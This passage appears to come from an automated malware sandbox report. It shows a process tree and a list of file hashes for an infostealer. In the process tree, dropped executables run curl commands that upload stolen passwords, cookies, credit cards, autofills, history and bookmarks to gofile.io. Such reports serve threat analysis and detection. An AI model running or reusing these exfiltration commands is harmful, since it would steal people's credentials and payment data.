                                                                                            • C:\Windows\system32\curl.exe
                                                                                              curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
                                                                                              5⤵
                                                                                                PID:5808
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store10.gofile.io/uploadFile"
                                                                                              4⤵
                                                                                                PID:5968
                                                                                                • C:\Windows\system32\curl.exe
                                                                                                  curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store10.gofile.io/uploadFile
                                                                                                  5⤵
                                                                                                    PID:4024
                                                                                            • C:\Windows\Fonts\1.exe
                                                                                              "C:\Windows\Fonts\1.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5644
                                                                                            • C:\Windows\Fonts\1.exe
                                                                                              "C:\Windows\Fonts\1.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4876
                                                                                            • C:\Windows\Fonts\1.exe
                                                                                              "C:\Windows\Fonts\1.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5992
                                                                                            • C:\Windows\Fonts\1.exe
                                                                                              "C:\Windows\Fonts\1.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2156
                                                                                            • C:\Windows\Fonts\tak.exe
                                                                                              "C:\Windows\Fonts\tak.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5352
                                                                                              • C:\Windows\Fonts\tak.exe
                                                                                                "C:\Windows\Fonts\tak.exe"
                                                                                                3⤵
                                                                                                • Drops startup file
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:6092
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store3.gofile.io/uploadFile"
                                                                                                  4⤵
                                                                                                    PID:2436
                                                                                                    • C:\Windows\system32\curl.exe
                                                                                                      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store3.gofile.io/uploadFile
                                                                                                      5⤵
                                                                                                        PID:1688
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store3.gofile.io/uploadFile"
                                                                                                      4⤵
                                                                                                        PID:6140
                                                                                                        • C:\Windows\system32\curl.exe
                                                                                                          curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store3.gofile.io/uploadFile
                                                                                                          5⤵
                                                                                                            PID:5424
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store3.gofile.io/uploadFile"
                                                                                                          4⤵
                                                                                                            PID:4720
                                                                                                            • C:\Windows\system32\curl.exe
                                                                                                              curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store3.gofile.io/uploadFile
                                                                                                              5⤵
                                                                                                                PID:5380
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store3.gofile.io/uploadFile"
                                                                                                              4⤵
                                                                                                                PID:4964
                                                                                                                • C:\Windows\system32\curl.exe
                                                                                                                  curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store3.gofile.io/uploadFile
                                                                                                                  5⤵
                                                                                                                    PID:2392
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store3.gofile.io/uploadFile"
                                                                                                                  4⤵
                                                                                                                    PID:5496
                                                                                                                    • C:\Windows\system32\curl.exe
                                                                                                                      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store3.gofile.io/uploadFile
                                                                                                                      5⤵
                                                                                                                        PID:4092
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store3.gofile.io/uploadFile"
                                                                                                                      4⤵
                                                                                                                        PID:4576
                                                                                                                        • C:\Windows\system32\curl.exe
                                                                                                                          curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store3.gofile.io/uploadFile
                                                                                                                          5⤵
                                                                                                                            PID:5372
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store3.gofile.io/uploadFile"
                                                                                                                          4⤵
                                                                                                                            PID:2484
                                                                                                                            • C:\Windows\system32\curl.exe
                                                                                                                              curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store3.gofile.io/uploadFile
                                                                                                                              5⤵
                                                                                                                                PID:5840
                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004F0
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5432
                                                                                                                      • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                        C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5416
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                        C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3260
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                        C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2904
                                                                                                                      • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                        C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3764
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                        C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1384
                                                                                                                      • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                        C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3216
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                        1⤵
                                                                                                                          PID:5408
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                          C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4916
                                                                                                                        • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                          C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5940
                                                                                                                        • C:\Windows\system32\notepad.exe
                                                                                                                          "C:\Windows\system32\notepad.exe"
                                                                                                                          1⤵
                                                                                                                            PID:3116
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1272
                                                                                                                          • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1576
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5160
                                                                                                                          • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3260
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3300
                                                                                                                          • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3056
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            C:\Users\Admin\AppData\Roaming\Kacper
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3304
                                                                                                                          • C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            C:\Users\Admin\AppData\Roaming\External_V3
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5664

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files\7-Zip\7-zip.dll

                                                                                                                            Filesize

                                                                                                                            99KB

                                                                                                                            MD5

                                                                                                                            8af282b10fd825dc83d827c1d8d23b53

                                                                                                                            SHA1

                                                                                                                            17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355

                                                                                                                            SHA256

                                                                                                                            1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca

                                                                                                                            SHA512

                                                                                                                            cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8

                                                                                                                          • C:\Program Files\7-Zip\7z.dll

                                                                                                                            Filesize

                                                                                                                            1.8MB

                                                                                                                            MD5

                                                                                                                            0009bd5e13766d11a23289734b383cbe

                                                                                                                            SHA1

                                                                                                                            913784502be52ce33078d75b97a1c1396414cf44

                                                                                                                            SHA256

                                                                                                                            3691adcefc6da67eedd02a1b1fc7a21894afd83ecf1b6216d303ed55a5f8d129

                                                                                                                            SHA512

                                                                                                                            d92cd55fcef5b15975c741f645f9c3cc53ae7cd5dffd5d5745adecf098b9957e8ed379e50f3d0855d54598e950b2dbf79094da70d94dfd7fc40bda7163a09b2b

                                                                                                                          • C:\Program Files\7-Zip\7zG.exe

                                                                                                                            Filesize

                                                                                                                            691KB

                                                                                                                            MD5

                                                                                                                            ef0279a7884b9dd13a8a2b6e6f105419

                                                                                                                            SHA1

                                                                                                                            755af3328261b37426bc495c6c64bba0c18870b2

                                                                                                                            SHA256

                                                                                                                            0cee5cb3da5dc517d2283d0d5dae69e9be68f1d8d64eca65c81daef9b0b8c69b

                                                                                                                            SHA512

                                                                                                                            9376a91b8fb3f03d5a777461b1644049eccac4d77b44334d3fe292debed16b4d40601ebe9accb29b386f37eb3ccc2415b92e5cc1735bcce600618734112d6d0e

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            627073ee3ca9676911bee35548eff2b8

                                                                                                                            SHA1

                                                                                                                            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                            SHA256

                                                                                                                            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                            SHA512

                                                                                                                            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                            Filesize

                                                                                                                            152B

                                                                                                                            MD5

                                                                                                                            b26cef15e9a3cc82fb429a163f96ac6b

                                                                                                                            SHA1

                                                                                                                            718ac4822198b1a21f43b6941d0d8df107fd0015

                                                                                                                            SHA256

                                                                                                                            73af2c2ebc9187187d887e4abc8b04561c55f36f7f9cdf20293d522ce5c2f506

                                                                                                                            SHA512

                                                                                                                            87f96314ea9a1f394d24de5657e61cc6809c961fd05280b4875a06bb928f4e19dadf725fcd0417f16c93cdceca349dd27dd95d0f8f0f756020322803b2f91cdc

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                            Filesize

                                                                                                                            152B

                                                                                                                            MD5

                                                                                                                            5efcc43219d778bd14d32016100f2708

                                                                                                                            SHA1

                                                                                                                            b06f6726698a68781854bc342a54e06bc4562217

                                                                                                                            SHA256

                                                                                                                            a7534c7d125854f7fe662a7951443cad1d1ff0d8d3eb537dde5a381cd3415666

                                                                                                                            SHA512

                                                                                                                            6bbdf16b41bbc3ac5d4e2b93683a712d56eb58719799f69cb7240a77f799928b48af2771f76d9d7829846db12d0116e3a8ea6c5d0f02d5e840db1b3c018480b4

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            33aaa27bc365349b3cdfdcb4a2a3b123

                                                                                                                            SHA1

                                                                                                                            c74a0bb71064160582627de5016a3205c5c6650f

                                                                                                                            SHA256

                                                                                                                            28d8c689ce7edf7ca2c727843312f08db072f43922ba5fbbf9416472b5e1805c

                                                                                                                            SHA512

                                                                                                                            9ff8ea3dbcb4d6db38845b384fac9918e8202fc7bfae7eff828b07ee2f91581dfc5360aff7b4df06717993a4007157d64e1b803ff6acab06267ba1b2f6164d11

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                            Filesize

                                                                                                                            3KB

                                                                                                                            MD5

                                                                                                                            ae84a08e4e2a8fff00927af08669dc9d

                                                                                                                            SHA1

                                                                                                                            05d4833706bffd81e01c5564c836c0a80673d6de

                                                                                                                            SHA256

                                                                                                                            6d2a86f83740b455d1a2dcfc2f0a8ef3ad032bc23817a240b95750d796d618e3

                                                                                                                            SHA512

                                                                                                                            e795ca1efd00b2f8db1e273d4b414a6a9e6f899b2735a054f7788eacaf6478ebd285b0429a29a4503b28490097644bfbedc48a7cc8f1b228640b43379ecea772

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                            Filesize

                                                                                                                            3KB

                                                                                                                            MD5

                                                                                                                            67b83f89a94c2be75d2af1a90381be62

                                                                                                                            SHA1

                                                                                                                            e772dc2a7bb0f971e23d65f32bd8fc48e7066960

                                                                                                                            SHA256

                                                                                                                            7b5780ba121386eea0844a53f32cf67d193a8eb3501260759dfdc491dd33e507

                                                                                                                            SHA512

                                                                                                                            84ed5554a886459b5d4f91e49775cc548d37ccb2df0004bbf4083b383182cda486f7f3411da6511e52b074758cef96adfe79d48fb673a43dcd60b923020ae469

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            5KB

                                                                                                                            MD5

                                                                                                                            5f806d0be21febae47e8f10e1495cf31

                                                                                                                            SHA1

                                                                                                                            9cbf164430d2f30efcbcec34e0ebbd840ed5ae6d

                                                                                                                            SHA256

                                                                                                                            0fd56a5ef1b04c21c8dbaa2c5456e1c00680928c5c533e09132e4603d78af6df

                                                                                                                            SHA512

                                                                                                                            e458069bc753b45f0f5bec7adf2eb5f466df83dabeb744a511fbf10830c26e8dc02ad7df6e8c6259974cfeece150a57342b602020d40d19777de0b1ac2c785e7

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            83818925c2e08fb8a1b74a14e4ab3637

                                                                                                                            SHA1

                                                                                                                            4783faa4f9a924e9b17a5a8f318a4b2efa1a5670

                                                                                                                            SHA256

                                                                                                                            636417b59f8f57553dda6175d9a00275ceb235ead57ba55f70ec65fc550d33ad

                                                                                                                            SHA512

                                                                                                                            3f8995be2023b02419b101c801e65a0f7392da0856d84e53c42d4e858c6e9ce427fc755736efd2437d906e013739448162ffb249a89537ac936eba4840e8392e

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            bcfa4250d1b1d50a9c82e3b23a683dcc

                                                                                                                            SHA1

                                                                                                                            fca19210e3643b9bd5586b1ec12b837d61a420df

                                                                                                                            SHA256

                                                                                                                            5436b84d521c7fba97b2b2449e47b3abae71c3ae10ac65c42ee570d0428dac43

                                                                                                                            SHA512

                                                                                                                            e5fc2c8802887fe91260301b2305ac7d8bc68256490aab26614f41e50f476277ff1a7f187c2a1696cfdde829296b6e39d7a50dca30057a46228e9ffc36afbe57

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            28bd4cd3762daecac0e19f8cc227e5c9

                                                                                                                            SHA1

                                                                                                                            29ea995194dfa3db2bd377ff247fe9880cc079e7

                                                                                                                            SHA256

                                                                                                                            c1366f7d81424ec1bbb7de98dc55205e38c9c39642fbdb9a381404dc359a582a

                                                                                                                            SHA512

                                                                                                                            648aaacdb7397c1a1f419d84be0958ab36391bd60fd52df0af812fb55e428dadbda91e6f33045d6f1c5323fa4e9e9eb1936cfe6ee1f739ee481d0f1a16fa1c56

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                            MD5

                                                                                                                            4eebe0092ee96aa462e4920a9716eaaf

                                                                                                                            SHA1

                                                                                                                            dcf56e6df99acda300cefe7fe8eb3d5060d29f0c

                                                                                                                            SHA256

                                                                                                                            55b9f72b9e0770c2b3d84fc9af5a9fc41360cb15b02792b89c9e53afbcb3b9b3

                                                                                                                            SHA512

                                                                                                                            f72bafec30298aa8fe2d53785f18fe876a8cc419ee3bbe37f856ce46d6d1c2bcd9c4c99d924f81057edf42f433b75d2fa0e031178ba0c0b4d86d0bb9b50bd52e

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            df463e0c9cb9f6f2039c3c021bdf4f17

                                                                                                                            SHA1

                                                                                                                            f7bbf2143c5829c982bdeb9e9a52cfe62df5a06a

                                                                                                                            SHA256

                                                                                                                            6059dd0e8c77a176149bfe8daac4ee4d3a3bfe8d10c3284d85e960d9ee74e045

                                                                                                                            SHA512

                                                                                                                            62b15f33c1c68fc239d92218e0f6d5ca42d4e7773f77c0565c87cd497d58dac00b2dd2d94b60ea35b6346912afdfe21b1835e3c80ee8452e591314f9ae16a2ed

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58194f.TMP

                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            10e117da46fc8d8fbcbb533324dc3d46

                                                                                                                            SHA1

                                                                                                                            e3d295f876868bfda866046018d6bb672d2fd11f

                                                                                                                            SHA256

                                                                                                                            b2196775add20edef60ad4363b91fb89282cced46aeecdbd01c74f45176fa91b

                                                                                                                            SHA512

                                                                                                                            a5e1a3a2e9b74752ac410fefd20c2206330e04fdda472a15002539e3d4e66555be211f4a88ebe4ed7486fdf40f08bdc18056072b2e0f49ef4bece2bef2a0c02e

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                            Filesize

                                                                                                                            16B

                                                                                                                            MD5

                                                                                                                            6752a1d65b201c13b62ea44016eb221f

                                                                                                                            SHA1

                                                                                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                            SHA256

                                                                                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                            SHA512

                                                                                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                            Filesize

                                                                                                                            11KB

                                                                                                                            MD5

                                                                                                                            e40a55cdaa915f71ffc99478fb221067

                                                                                                                            SHA1

                                                                                                                            e4b8f2ee5c1c7f72c44369ca3d58dc0a5e7112ff

                                                                                                                            SHA256

                                                                                                                            0dd33422e15d5745b4f1caae4ded804de6890878602791bd3b47c9b7b422ba5e

                                                                                                                            SHA512

                                                                                                                            906f095e603f4f60aceede81a9f8a87d6dce4a2661eee9f37899e36c8b645cb25f16218c3e983b18c27d127ead472ad490490a45ec684d6d815d6c2c3bce5977

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                            Filesize

                                                                                                                            11KB

                                                                                                                            MD5

                                                                                                                            3eec3e3f9ee01b805228f1d78e423f22

                                                                                                                            SHA1

                                                                                                                            ca873d82f954231511b0c257c1ffbd3ebe0829d6

                                                                                                                            SHA256

                                                                                                                            24048aa1d97d3d114ab308aea78722e01674796feb2144ce11aa35df5e79edc4

                                                                                                                            SHA512

                                                                                                                            00755f471c3a231844ccb255617ccd828ef0d97931c4325545f527f7f9f24e0e984c1599d9c2a2edae2df1683dc733f48b8ab9596ab3f95400d786e603c844c5

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                            Filesize

                                                                                                                            11KB

                                                                                                                            MD5

                                                                                                                            8a21acf14b9f5f876d9a81701d727508

                                                                                                                            SHA1

                                                                                                                            35257f9430dc1be1bca9c5431532e2752e192b4c

                                                                                                                            SHA256

                                                                                                                            aee072fec2e32fc88005367812716aad6c7f83598cf93584e44bb7f6e8c42fa4

                                                                                                                            SHA512

                                                                                                                            3ca31045c775cf2924f6b6bb47ee3e4b56fc92c0f4eed8e828717ebcd86f5251a184830fd4cb7e3ddc1388710ba6c9e5d495a3fbac9344ab722f6249f2b674be

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                            Filesize

                                                                                                                            11KB

                                                                                                                            MD5

                                                                                                                            ce1f136320f2ebe6380c414412c8bbe6

                                                                                                                            SHA1

                                                                                                                            7f2337194da6751a57ae8febc248029668fc77b9

                                                                                                                            SHA256

                                                                                                                            a4467e327f7a1335fe68d75eab9c546c7d9818023402604d532adcf2e50c615c

                                                                                                                            SHA512

                                                                                                                            5b5dab79e1ceae0e0f84a3a518d2015652f75ab78bfb0748bf033e78c2c7d418958a09c4a0b20b66ae18f4f2f13bfd5aa6db3e0017332f18df28f9ba0790f868

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                                                                                                            SHA1

                                                                                                                            9910190edfaccece1dfcc1d92e357772f5dae8f7

                                                                                                                            SHA256

                                                                                                                            0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                                                                                                            SHA512

                                                                                                                            5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            cef328ddb1ee8916e7a658919323edd8

                                                                                                                            SHA1

                                                                                                                            a676234d426917535e174f85eabe4ef8b88256a5

                                                                                                                            SHA256

                                                                                                                            a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90

                                                                                                                            SHA512

                                                                                                                            747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            051a74485331f9d9f5014e58ec71566c

                                                                                                                            SHA1

                                                                                                                            4ed0256a84f2e95609a0b4d5c249bca624db8fe4

                                                                                                                            SHA256

                                                                                                                            3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

                                                                                                                            SHA512

                                                                                                                            1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI23922\setuptools-65.5.0.dist-info\INSTALLER

                                                                                                                            Filesize

                                                                                                                            4B

                                                                                                                            MD5

                                                                                                                            365c9bfeb7d89244f2ce01c1de44cb85

                                                                                                                            SHA1

                                                                                                                            d7a03141d5d6b1e88b6b59ef08b6681df212c599

                                                                                                                            SHA256

                                                                                                                            ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

                                                                                                                            SHA512

                                                                                                                            d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4haapvr.kns.ps1

                                                                                                                            Filesize

                                                                                                                            60B

                                                                                                                            MD5

                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                            SHA1

                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                            SHA256

                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                            SHA512

                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp45F8.tmp.bat

                                                                                                                            Filesize

                                                                                                                            151B

                                                                                                                            MD5

                                                                                                                            4ea9b3ad719831d1fd68ec73cb8152f8

                                                                                                                            SHA1

                                                                                                                            c744edb441206487ae39bf77fdb9e62a387eb35c

                                                                                                                            SHA256

                                                                                                                            390226d53d94a1ca938df4f172fa5e62cd6f5b8cb7abe7332c865d01a81e2773

                                                                                                                            SHA512

                                                                                                                            9a927a2a7f152f3c2e79464016f80ec7d8e8bcf4388f762332c3dcf7f74fffca09cec624240176d809801348d967a7eacb21ccb292dc15e06b61777e2c2e19a1

                                                                                                                          • C:\Users\Admin\AppData\Local\Tempcscejlhilm.db

                                                                                                                            Filesize

                                                                                                                            160KB

                                                                                                                            MD5

                                                                                                                            f310cf1ff562ae14449e0167a3e1fe46

                                                                                                                            SHA1

                                                                                                                            85c58afa9049467031c6c2b17f5c12ca73bb2788

                                                                                                                            SHA256

                                                                                                                            e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

                                                                                                                            SHA512

                                                                                                                            1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

                                                                                                                          • C:\Users\Admin\AppData\Local\Tempcsfnencbme.db

                                                                                                                            Filesize

                                                                                                                            114KB

                                                                                                                            MD5

                                                                                                                            0c94943165a18aa09b79c1c619d8b512

                                                                                                                            SHA1

                                                                                                                            24f4b50b649d87a8120134f11b176fb22ada00f2

                                                                                                                            SHA256

                                                                                                                            c69715a4cf751335cac427203bc14ebf27bc1bf505ba7e366dca8be5fdf67944

                                                                                                                            SHA512

